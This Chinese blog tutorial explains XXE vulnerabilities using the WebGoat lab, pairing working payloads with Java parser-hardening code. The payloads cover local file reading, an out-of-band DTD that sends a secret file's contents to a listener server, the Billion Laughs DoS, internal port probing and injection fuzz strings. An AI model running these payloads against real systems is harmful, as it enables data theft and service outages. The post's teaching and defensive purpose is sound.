当前位置:   article > 正文

Web安全--XXE_external-general-entities

external-general-entities

0x01 简介

 

顺手搜了一下CVE,XXE的问题还真不少。

XXE,XML External Entity (外部实体)。

DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。它使用一系列的合法元素来定义文档结构。

一般实体(General Entities)

可在xml中进行引用,&js;

 

  1. <?xml version="1.0" standalone="yes" ?>
  2. <!DOCTYPE author [
  3. <!ELEMENT author (#PCDATA)>
  4. <!ENTITY js "Jo Smith"> // js 为dtd中声明的内部实体
  5. ]>
  6. <author>&js;</author> // 通过&js;进行引用

外部实体(External Entities)

可获取外部资源(非xml中声明的),可用于一般实体、参数实体

 

  1. <?xml version="1.0" encoding="utf-8"?>
  2. // DTD 定义,root为声明的外部实体
  3. <!DOCTYPE user [
  4. <!ENTITY root SYSTEM "file:///c:\">
  5. ]>
  6. <comment>
  7. <text>&root;Hello</text> //&root;引用
  8. </comment>
  9. // 也可以是使用PUBLIC关键字进行定义,读取公共资源
  10. <!ENTITY name PUBLIC "any_text" "URI/URL">

外部是实体支持http、file等协议,具体如下:

 

参数实体(Parameter entities)

可在doctype声明中使用,也可以在实体定义value 中使用

  1. <?xml version="1.0"?>
  2. <!DOCTYPE root [
  3. <!ENTITY % remote SYSTEM "http://192.168.3.112:9090/WebWolf/files/attack.dtd">
  4. %remote;
  5. ]>
  6. <comment>
  7. <text>test&ping;</text>
  8. </comment>
  9. // 其他如:
  10. <!ENTITY % name "Hello World">
  11. <!ENTITY % name "Hello %myEntity;">

说完实体的概念,基本就能看清楚漏洞的原理了,通过外部实体(http、ftp)获取信息。

0x02 漏洞危害

读取任意文件

因为外部实体支持ftp协议,可以构造payload获取目录、文件信息。

具体可参考webgoat8 xxe stage 3,利用也比较简单。

 

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE user [<!ENTITY root SYSTEM "file:///c:\"> ]>
  3. <comment>
  4. <text>&root;xxe</text>
  5. </comment>

如果没有回显,通过Bland XXE(OOB)进行利用,具体参考webgoat8 xxe stage 7

搭一个服务器(A)接收http请求发送的数据,A服务器定义attack.dtd

目标机解析包含payload的xml,外部实体读取attack.dtd,然后发送数据至获取数据。

attack.dtd

 

  1. <?xml version="1.0" encoding="UTF-8"?>
  2. // 参数实体、外部实体,读取目标机文件
  3. <!ENTITY % file SYSTEM "file:///c:/Users/derek/.webgoat-8.0.0.M24/XXE/secret.txt">
  4. // 参数实体,实体内定义外部实体访问A服务器并发送读取的内容
  5. <!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.3.103:9091/landing?text=%file;'>">
  6. %all;

payload:

 

  1. <?xml version="1.0"?>
  2. <!DOCTYPE root [
  3. <!ENTITY % remote SYSTEM "http://192.168.3.103:9091/files/admin1/attack2.dtd">
  4. %remote;
  5. ]>
  6. <comment>
  7. <text>test123---&send;</text>
  8. </comment>

DOS攻击

通过构造恶意实体,指数级生成超大xml文档,服务器在解析时好景资源,导致DOS。此示例及著名的Billion laughs attack

payload:

 

  1. <?xml version="1.0"?>
  2. <!DOCTYPE lolz [
  3. <!ENTITY lol "lol">
  4. <!ELEMENT lolz (#PCDATA)>
  5. <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  6. <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  7. <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  8. <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  9. <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  10. <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  11. <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  12. <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  13. <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
  14. ]>
  15. <lolz>&lol9;</lolz>

内网探测

因为外部实体支持ftp、http等协议,所以可利用进行内网探测(服务器、端口),甚至进行账号、密码爆破。

服务器、端口探测

 

  1. <?xml version="1.0" encoding="utf-8"?>
  2. <!DOCTYPE user [<!ENTITY root SYSTEM "http://192.168.3.103:9090/index.html"> ]>
  3. <comment>
  4. <text>&root;xxe</text>
  5. </comment>

用webgoat8 xxe 的例子试一下,把webwolf当成内网机器。

 

左边是可访问地址,返回解析错误。

 

  1. "javax.xml.bind.UnmarshalException\\n - with linked exception:
  2. \\n[javax.xml.stream.XMLStreamException:
  3. ParseError at [row,col]:[4,15]
  4. \\nMessage: http:\\/\\/192.168.3.103:9091\\/WebGoat]\\r\\n\\tat com.sun.xml.bind.v2.runtime.unmarshaller.UnmarshallerImpl.handleStreamEx

右边端口未开放,拒绝连接,且响应时间明显会长一些。

 

  1. "javax.xml.bind.UnmarshalException\\n - with linked exception:
  2. \\n[javax.xml.stream.XMLStreamException:
  3. ParseError at [row,col]:[4,15]\\nMessage: Connection refused: connect

远程代码执行(RCE)

针对PHP环境中安装expect扩展,通过返回报错信息、返回时间等进行判断。

payload如下,具体示例懒得搭环境了。

 

  1. <?xml version="1.0"?>
  2. <!DOCTYPE ANY [
  3. <!ENTITY test SYSTEM "http://ip:80/tets.txt">
  4. ]>
  5. <abc>&test;</abc>

 

0x03 漏洞检测

黑盒

  • 看到xml传输数据,必须试一把xxe;
  • 对于一些json传输,修改content-type,是否可注入xml;
  • 使用xml标签进行闭合,是否可打到篡改目的;
  • 单引号、双引号、注释、地址符、外部实体引用

 

  1. ‘ " & < > ]]>
  2. <!--
  3. <![CDATA[ / ]]> -
  4. <![CDATA[<]]>script<![CDATA[>]]>alert(‘xss’)<![CDATA[<]]>/
  5. script<![CDATA[>]]>
  6. <!ENTITY test SYSTEM "http://ip:80/tets.txt">
  • XML Injection Fuzz Strings   fuze工具
https:/wfuzz.googlecode.com/svn/trunk/wordlist/Injections/ XML.txt

白盒

审计源码,查看XML处理是否禁用实体,常用的xml解析类如下:

  • DOM: import javax.xml.parsers.DocumentBuilder/DocumentBuilderFactory
  • Dom4j: import org.dom4j.io.SAXReader
  • JDOM:    import org.jdom2.input.SAXBuilder
  • SAX:   import javax.xml.parsers.SAXParser/SAXParserFactory
  • JAXB: import javax.xml.bind.Unmarshaller
  • StAX: import javax.xml.paresers.SAXPareserFactory / javax.xml.stream.XMLStreamReader
  • javax.xml.transform.TransformerFactory

除了上方列出xml解析器,一些存在XXE的常用第三方组件:

  • Spring OXM & Spring MVC(3.0.0 - 3.2.3)
  • Spring OXM (4.0.0.M1)
  • Spring MVC (4.0.0.M1-4.0.0.M2)
  • Apache POI  (3.11以下,excel解析)

0x04 防御

防御的话,最好直接禁用DTD;

如果有需要使用DTD,禁用外部实体;

对用户输入进行必要的验证及过滤;

  • DocumentBuilderFactory

 

  1. DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
  2. String FEATURE = null;
  3. try {
  4. FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
  5. dbf.setFeature(FEATURE, true);
  6. FEATURE = "http://xml.org/sax/features/external-general-entities";
  7. dbf.setFeature(FEATURE, false);
  8. FEATURE = "http://xml.org/sax/features/external-parameter-entities";
  9. dbf.setFeature(FEATURE, false);
  10. FEATURE = "http://apache.org/xml/features/nonvalidating/load-external-dtd";
  11. dbf.setFeature(FEATURE, false);
  12. dbf.setXIncludeAware(false);
  13. dbf.setExpandEntityReferences(false);
  14. ...
  15. } catch (XXXException e) {
  16. ...
  17. }
  • XMLInputFactory

 

 

  1. // This disables DTDs entirely for that factory
  2. xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
  3. // disable external entities
  4. xmlInputFactory.setProperty("javax.xml.stream.isSupportingExternalEntities", false);

 

  • XMLReader

 

  1. XMLReader reader = XMLReaderFactory.createXMLReader();
  2. reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
  3. // This may not be strictly required as DTDs shouldn't be allowed at all, per previous line.
  4. reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
  5. reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
  6. reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  • SAXReader

 

  1. saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
  2. saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
  3. saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  • SAXBuilder

 

  1. SAXBuilder builder = new SAXBuilder();
  2. builder.setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
  3. builder.setFeature("http://xml.org/sax/features/external-general-entities", false);
  4. builder.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  5. Document doc = builder.build(new File(fileName));
  • Ummarshaller

 

  1. //Disable XXE
  2. SAXParserFactory spf = SAXParserFactory.newInstance();
  3. spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
  4. spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
  5. spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
  6. //Do unmarshall operation
  7. Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(),
  8. new InputSource(new StringReader(xml)));
  9. JAXBContext jc = JAXBContext.newInstance(Object.class);
  10. Unmarshaller um = jc.createUnmarshaller();
  11. um.unmarshal(xmlSource);

参考:

https://www.freebuf.com/articles/web/177979.html

https://www.freebuf.com/column/181064.html

https://www.freebuf.com/vuls/176837.html

https://www.freebuf.com/vuls/194112.html

https://xz.aliyun.com/t/2571

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_Security_Cheat_Sheet.md

 

 

 

 

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/寸_铁/article/detail/827699
推荐阅读
  

闽ICP备14008679号